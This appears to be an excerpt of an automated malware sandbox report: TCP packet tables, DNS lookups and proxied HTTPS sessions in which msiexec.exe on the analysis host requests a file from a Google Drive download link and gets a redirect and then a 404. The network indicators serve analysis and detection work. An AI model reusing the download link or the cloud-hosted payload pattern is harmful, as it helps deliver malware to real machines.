                                                                                          Jan 10, 2025 15:18:07.069063902 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.069528103 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.111342907 CET44350043142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:07.450805902 CET44350043142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:07.450886011 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.450901985 CET44350043142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:07.450942039 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.451329947 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.451385021 CET44350043142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:07.451433897 CET50043443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:07.462802887 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:07.462858915 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:07.462939978 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:07.463174105 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:07.463191986 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.095683098 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.095892906 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.096658945 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.096671104 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.096833944 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.096838951 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.535877943 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.535991907 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536065102 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.536098957 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.536128998 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536154032 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.536180019 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536201000 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536211014 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.536266088 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536271095 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.536328077 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536819935 CET50044443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:08.536853075 CET44350044216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.666362047 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:08.666423082 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:08.666510105 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:08.666799068 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:08.666817904 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.334955931 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.335052967 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.336102009 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.336203098 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.338325024 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.338337898 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.338622093 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.338675976 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.339107990 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.379334927 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.722621918 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.722735882 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.722934961 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.722994089 CET44350046142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.723083973 CET50046443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:09.739336014 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:09.739429951 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:09.739491940 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:09.739842892 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:09.739869118 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.390510082 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.390578032 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.391110897 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.391123056 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.391292095 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.391299009 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.831048012 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.831093073 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.831157923 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.831228971 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.831263065 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.831284046 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.831866980 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.831912041 CET44350047216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.831976891 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.832005024 CET50047443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:10.963078976 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:10.963134050 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:10.963213921 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:10.963582039 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:10.963597059 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:11.626305103 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:11.626425982 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:11.626961946 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:11.627022028 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:11.628882885 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:11.628890038 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:11.629148960 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:11.629225969 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:11.629642963 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:11.671329975 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.025197029 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.025340080 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:12.026485920 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.026629925 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.026707888 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:12.029266119 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:12.029331923 CET44350048142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.029370070 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:12.029402971 CET50048443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:12.062930107 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.062977076 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.063061953 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.063285112 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.063297987 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.712769032 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.712904930 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.717412949 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.717432976 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.717711926 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:12.717777967 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.718274117 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:12.759339094 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.154829979 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.154891968 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.154954910 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:13.154961109 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.154992104 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:13.155014992 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:13.155788898 CET50049443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:13.155803919 CET44350049216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.275624037 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.275679111 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.275794983 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.276103020 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.276114941 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.927817106 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.927928925 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.928566933 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.928579092 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:13.928797960 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:13.928805113 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.333148956 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.333271027 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:14.333307028 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.333357096 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:14.333430052 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:14.333466053 CET44350050142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.333509922 CET50050443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:14.345429897 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.345463037 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.345534086 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.345804930 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.345814943 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.988796949 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.988955975 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989804983 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989813089 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:14.989886999 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:14.989892960 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425324917 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425442934 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425457001 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425471067 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425494909 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425529957 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.425546885 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.425587893 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.465800047 CET50051443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:15.465837002 CET44350051216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.682092905 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682137966 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:15.682209969 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682482004 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:15.682492971 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.321924925 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.322069883 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.322725058 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.322771072 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.324469090 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.324477911 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.324707985 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.327398062 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.327763081 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.375329018 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713649035 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713706017 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713730097 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.713824034 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713824034 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.713903904 CET44350052142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.714143038 CET50052443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:16.720103025 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720151901 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:16.720212936 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720472097 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:16.720487118 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.373409986 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.373564005 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.373994112 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.374006987 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.374214888 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.374260902 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830306053 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830374956 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830393076 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830406904 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830432892 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830472946 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830487967 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830502033 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.830528021 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.830550909 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.831470013 CET50053443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:17.831495047 CET44350053216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.947499037 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.947551012 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:17.947655916 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.948123932 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:17.948146105 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.581167936 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.581288099 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.582046986 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.582098961 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.583587885 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.583600044 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.583844900 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.583893061 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.584160089 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.631326914 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972038984 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972106934 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972121000 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972165108 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972259998 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972299099 CET44350054142.250.185.110192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.972343922 CET50054443192.168.2.6142.250.185.110
                                                                                          Jan 10, 2025 15:18:18.972938061 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.972979069 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:18.973051071 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.973242044 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:18.973253965 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.620901108 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.621398926 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621561050 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621592045 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:19.621742010 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:19.621757984 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058739901 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058809996 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058809042 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058835983 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058875084 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058883905 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058896065 CET44350055216.58.206.65192.168.2.6
                                                                                          Jan 10, 2025 15:18:20.058916092 CET50055443192.168.2.6216.58.206.65
                                                                                          Jan 10, 2025 15:18:20.058943987 CET50055443192.168.2.6216.58.206.65

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 10, 2025 15:16:57.639956951 CET6093553192.168.2.61.1.1.1
                                                                                          Jan 10, 2025 15:16:57.646770954 CET53609351.1.1.1192.168.2.6
                                                                                          Jan 10, 2025 15:16:58.770102978 CET6105453192.168.2.61.1.1.1
                                                                                          Jan 10, 2025 15:16:58.777579069 CET53610541.1.1.1192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 10, 2025 15:16:57.639956951 CET192.168.2.61.1.1.10xa5c1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                          Jan 10, 2025 15:16:58.770102978 CET192.168.2.61.1.1.10x92cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 10, 2025 15:16:57.646770954 CET1.1.1.1192.168.2.60xa5c1No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                          Jan 10, 2025 15:16:58.777579069 CET1.1.1.1192.168.2.60x92cNo error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • drive.google.com
                                                                                          • drive.usercontent.google.com

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.649917142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:16:58 UTC216OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-10 14:16:58 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:16:58 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-1gBZ1HlJZ9olZdkpoDnqDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.649923216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:16:59 UTC258OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          2025-01-10 14:16:59 UTC2226INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6MDHQ11rPu1adBbHNkRayT-uroBYsCNflam6rz9IHkAO_KzEyDBJqdZn4d52xK9kLN-mrz51U
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:16:59 GMT
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-QRH0QhO-P5se56J6v6NGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
